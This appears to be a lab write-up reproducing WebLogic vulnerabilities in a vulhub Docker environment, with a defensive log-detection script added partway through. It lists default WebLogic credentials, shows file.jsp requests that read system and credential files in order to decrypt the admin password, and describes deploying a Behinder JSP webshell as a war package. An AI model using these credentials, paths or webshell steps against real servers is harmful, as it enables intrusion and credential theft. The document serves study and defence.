Environment setup:
1. Pull docker:
cd /home/kali/桌面/vulhub/weblogic/weak_password
sudo docker-compose up -d
2. View the docker port mapping information
sudo docker ps
3. Open the console login page in the browser:
http://192.168.111.128:7001/console/login/LoginForm.jsp
Vulnerability reproduction
1. WebLogic weak passwords (list copied from someone else). The account for this environment is weblogic, password: weblogic@123
(1) Oracle - WebLogic
Method: HTTP
User ID: system
Password: password
Level: Administrator
Notes: Login located at /console
(2) Oracle - WebLogic
Method: HTTP
User ID: weblogic
Password: weblogic
Level: Administrator
Notes: Login located at /console
(3) Oracle - WebLogic
Version: 9.0 Beta (Diablo)
User ID: weblogic
Password: weblogic
(4) Oracle - WebLogic Process Integrator
Version: 2.0
User ID: admin
Password: security
(5) Oracle - WebLogic Process Integrator
Version: 2.0
User ID: joe
Password: password
(6) Oracle - WebLogic Process Integrator
Version: 2.0
User ID: mary
Password: password
(7) Oracle - WebLogic Process Integrator
Version: 2.0
User ID: system
Password: security
(8) Oracle - WebLogic Process Integrator
Version: 2.0
User ID: wlcsystem
Password: wlcsystem
(9) Oracle - WebLogic Process Integrator
Version: 2.0
User ID: wlpisystem
Password: wlpisystem
2. WebLogic arbitrary file read vulnerability
Visit:
http://192.168.111.128:7001/hello/file.jsp?path=/etc/pass
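This downloads the pass file. The arbitrary file read can be used to read the SerializedSystemIni.dat and config.xml files under the base_domain folder, in order to decrypt the WebLogic password.
1) Visit the address below, capture the request with Burp Suite, and send it to the "Repeater" feature.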
http://192.168.111.128:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
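Select the garbled bytes in the response (select them, then right-click) and save them as a bat file.
2) Use the "Repeater" feature to request the address below; the encrypted password is visible in the response.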
http://192.168.111.128:7001/hello/file.jsp?path=config/config.xml
Then decrypt it with a decryption tool. Download address:
https://github.com/TideSec/Decrypt_Weblogic_Password
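The two reads above leave a recognizable trace in the server's access log. The following is an added example, not code from the original post: it scans access-log lines for successful file.jsp requests and reports clients that fetched both SerializedSystemIni.dat and config.xml, in which case the stored passwords should be treated as exposed and rotated. The common log format, the sample lines and all function names are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format), not from a real server.
SAMPLE_LOG = """\
192.168.111.1 - - [21/Feb/2022:10:00:01 +0000] "GET /hello/file.jsp?path=/etc/pass HTTP/1.1" 200 1024
192.168.111.1 - - [21/Feb/2022:10:00:09 +0000] "GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1" 200 64
192.168.111.1 - - [21/Feb/2022:10:00:15 +0000] "GET /hello/file.jsp?path=config%2Fconfig.xml HTTP/1.1" 200 4096
192.168.111.7 - - [21/Feb/2022:10:01:00 +0000] "GET /hello/file.jsp?path=config/config.xml HTTP/1.1" 404 0
192.168.111.9 - - [21/Feb/2022:10:02:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')
# File name (lower-cased) -> finding: the key file plus config.xml allow decryption.
SENSITIVE = {"serializedsystemini.dat": "key_file_read", "config.xml": "config_read"}

def decoded_path_params(url):
    """Return every 'path' query value, decoded once more to catch double encoding."""
    values = parse_qs(urlsplit(url).query).get("path", [])
    return [unquote(v).replace("\\", "/").lower() for v in values]

def analyse(log_text):
    """Map client IP -> set of findings for successful (HTTP 200) file.jsp reads."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(3) != "200":
            continue
        client, url = m.group(1), m.group(2)
        if not urlsplit(url).path.lower().endswith("/file.jsp"):
            continue
        for value in decoded_path_params(url):
            name = value.rsplit("/", 1)[-1]
            if name in SENSITIVE:
                findings[client].add(SENSITIVE[name])
            elif value.startswith("/") or ".." in value:
                findings[client].add("path_outside_domain")
    return findings

def credential_exposure(findings):
    """Clients that fetched both files needed to decrypt the stored passwords."""
    return sorted(c for c, f in findings.items() if set(SENSITIVE.values()) <= f)

if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    print({client: sorted(found) for client, found in result.items()})
    print("both files read by:", credential_exposure(result))
```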
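3. Getting a shell through the admin console
1) Prepare the war package: (a war is a web module that can be run directly, usually used for websites, and is packaged and deployed into a container. Once the war package is placed in the web directory it is unpacked automatically, which is equivalent to publishing it.)
jar -cvf blog.war shell.jsp ----------- build the war package from the Behinder (冰蝎) JSP webshell
2) Enter the WebLogic admin console and click
"Deployments" -> "Install" -> "Upload your file(s)" -> "Next" -> "Next" (keep clicking Next until "Finish" appears, then click Finish)
Finally we can see that the war package we uploaded has been installed.
Then we connect with Behinder to http://192.168.111.128:7001/shell/shell.jsp
Reference: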
https://blog.csdn.net/cscscys/article/details/107856619?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164542919816780357272716%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164542919816780357272716&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-3-107856619.pc_search_result_cache&utm_term=weblogic+weak_password&spm=1018.2226.3001.4187